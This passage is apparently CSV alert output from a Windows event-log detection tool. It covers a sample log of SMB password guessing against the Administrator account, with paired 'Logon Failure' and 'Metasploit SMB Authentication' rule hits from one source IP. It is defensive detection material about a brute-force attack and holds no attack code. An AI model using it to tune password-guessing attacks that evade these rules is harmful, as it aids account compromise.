Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: feaA6lAxWjapFbAW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.181 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IJZjTqY5innWcvSZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ymXIp0KTw0vIbB0N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.273 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZpPJEcLv7BoZaQwT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cz14Cv861RhFh0Pa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H8BklDHdS0cdcbGu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0m5Mznl2khRMj31V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ha6TuN7C8V0roSAK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.472 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9oBW0yE5a9zSkpIH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.517 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.566 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n54EaKOUQIX9geqx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.566 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m6WCg3o4oatO42wW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.617 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KfCwo8ZUWiBqI8zC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.656 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8potisENMIsbNxcd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.692 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WgagMNj95dkg9uQd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.732 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o1EVsGLFugwePvgR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6q00SeueJQAiBGpe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QWzSR1cJ2XJNirSW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.861 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 39MY5ZvRJSHVkZZV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.904 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WyOdltctwdHNkH6i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.944 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OUcWk0xJn9zVMZSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.989 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f2sauqNlJi3y0ZBk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.023 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bkih5QcLlcjw9gjg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3KlUJslcpS9jhLY4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.104 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: riuVWV1Ugr9c22hR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5OSj1I0sXkPf96OL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.189 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KsOJDxDiZSjoBj6F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.229 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uH0bQ9zEi1xcfHn3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3AfNT0p4JC1VEfDd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.308 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S7T8R8U1WVHZQrYk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.353 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kamexpa7isWT8gLC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.388 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8CyHFKVcdTo0Upx3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U30aMcZuBD08GWK1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.480 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4mihftSCNCYdlBny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.527 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.553 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K2wa0xwK6tnurGJQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.553 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0V3TbNrKEnrDcEYt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.588 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T73JW9JURm8Br6MA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OAleyg3h8aMvVVJk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.673 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1LQllnWZFUIWa6rw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.713 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlwPxSGUmvYH0rpL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.757 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VrI56o5TyeO48rQV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CKRMn75tv5Yi5rYK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.845 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MbJvec7rVisJ6WCC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.889 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xoubp5WTPqblBaps : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rBczkR92cKY41icQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MfUx3OizEb1LiOzj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.005 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SRaSOLOWhBEr0qkz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YnlI8Zh4td5m1fpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 